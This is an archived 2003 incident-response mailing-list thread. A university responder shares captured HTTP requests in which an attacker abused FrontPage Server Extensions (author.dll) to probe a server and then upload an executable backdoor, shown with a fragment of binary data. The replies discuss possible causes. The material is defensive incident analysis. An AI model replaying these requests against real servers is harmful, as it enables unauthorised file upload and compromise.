It is not Webdav at all. It looks like you don't set up the permissions for your FPSE correctly and allow anybody to run the author page. Hope that help. Tri Huynh SentryUnion ----- Original Message ----- From: "Eric Kimminau" <rootat_private> To: "Jordan Wiens" <jwiensat_private> Cc: <incidentsat_private> Sent: Thursday, July 03, 2003 11:05 AM Subject: Re: frontpage extensions; backdoor or initial compromise? > Im assuming it was WebDAV, right? Get your Windows boxes patched and > keep close tabs on them on Sunday. > > Eric. > > > On Wed, 2 Jul 2003, Jordan Wiens wrote: > > > Date: Wed, 2 Jul 2003 13:08:43 -0400 (EDT) > > From: Jordan Wiens <jwiensat_private> > > To: incidentsat_private > > Subject: frontpage extensions; backdoor or initial compromise? > > > > We had a recent compromise that our IDS did not detect, however, it did > > detect subsequent backdoor activity and a few other packets afterwards > > that alerted us to the compromise. Upon closer investigation of the > > activity, some of the additional information logged showed some frontpage > > extensions being used in an interesting way. Anyone else seen this? > > > > Since we were unable to determine the initial compromise method, I'm > > trying to figure out if this was purely used as a backdoor, or might also > > have been the same method as the initial compromise. > > > > Some additional background info; the svchost.exe is a renamed servu ftp > > daemon process that was loaded into the server along with a few other, > > 'normal' backdoor tools. > > > > -- > > Jordan Wiens > > UF Network Incident Response Team > > (352)392-2061 > > > > ATTACK: > > --------------- > > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 > > Date: Tue, 01 Jul 2003 20:33:10 GMT > > MIME-Version: 1.0 > > User-Agent: MSFrontPage/4.0 > > Host: aaa.bbb.ccc.ddd > > Accept: auth/sicily > > Content-Length: 112 > > Content-Type: application/x-www-form-urlencoded > > X-Vermeer-Content-Type: application/x-www-form-urlencoded > > Connection: Keep-Alive > > Cache-Control: no-cache > > > > method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&lis tHiddenDocs=false&listLinkInfo=true > > > > > > SERVER RESPONSE: > > --------------- > > HTTP/1.1 100 Continue > > Server: Microsoft-IIS/5.0 > > Date: Tue, 01 Jul 2003 20:30:02 GMT > > > > HTTP/1.1 200 OK > > Server: Microsoft-IIS/5.0 > > Date: Tue, 01 Jul 2003 20:30:02 GMT > > Connection: close > > Content-type: application/x-vermeer-rpc > > X-FrontPage-User-Name: IUSR_MACHINE > > > > <html><head><title>vermeer RPC packet</title></head> > > <body> > > <p>method=getDocsMetaInfo:4.0.2.4715 > > <p>document_list= > > <ul> > > </ul> > > <p>failedUrls= > > <ul> > > <li>svchost.exe > > </ul> > > </body> > > </html> > > > > > > > > Additional session.... > > > > ATTACKER: > > --------------- > > POST /_vti_bin/_vti_aut/author.dll HTTP/1.1 > > Date: Tue, 01 Jul 2003 20:33:29 GMT > > MIME-Version: 1.0 > > User-Agent: MSFrontPage/4.0 > > Host: aaa.bbb.ccc.ddd > > Accept: auth/sicily > > Content-Length: 2142969 > > Content-Type: application/x-vermeer-urlencoded > > X-Vermeer-Content-Type: application/x-vermeer-urlencoded > > Connection: Keep-Alive > > Cache-Control: no-cache > > > > > > SERVER: > > --------------- > > HTTP/1.1 100 Continue > > Server: Microsoft-IIS/5.0 > > Date: Tue, 01 Jul 2003 20:30:21 GMT > > > > ATTACKER: > > --------------- > > method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument% 5fname%3dsvss%2eexe%3bmeta%5finfo% > > 3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrat or%5d%5d&put%5foption=edit&comment=&keep%5fch > > ecked%5fout=false > > MZP@!L!This program must be run under Win32 > > $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata > > .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS > > htM=[s > > . > > . Additional raw data. > > . > > > > -------------------------------------------------------------------------- -- > > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the > > world's premier technical IT security event! 10 tracks, 15 training sessions, > > 1,800 delegates from 30 nations including all of the top experts, from CSO's to > > "underground" security specialists. See for yourself what the buzz is about! > > Early-bird registration ends July 3. This event will sell out. www.blackhat.com > > -------------------------------------------------------------------------- -- > > > > > > > -------------------------------------------------------------------------- -- > Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the > world's premier technical IT security event! 10 tracks, 15 training sessions, > 1,800 delegates from 30 nations including all of the top experts, from CSO's to > "underground" security specialists. See for yourself what the buzz is about! > Early-bird registration ends July 3. This event will sell out. www.blackhat.com > -------------------------------------------------------------------------- -- > > > ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Sat Jul 05 2003 - 10:27:39 PDT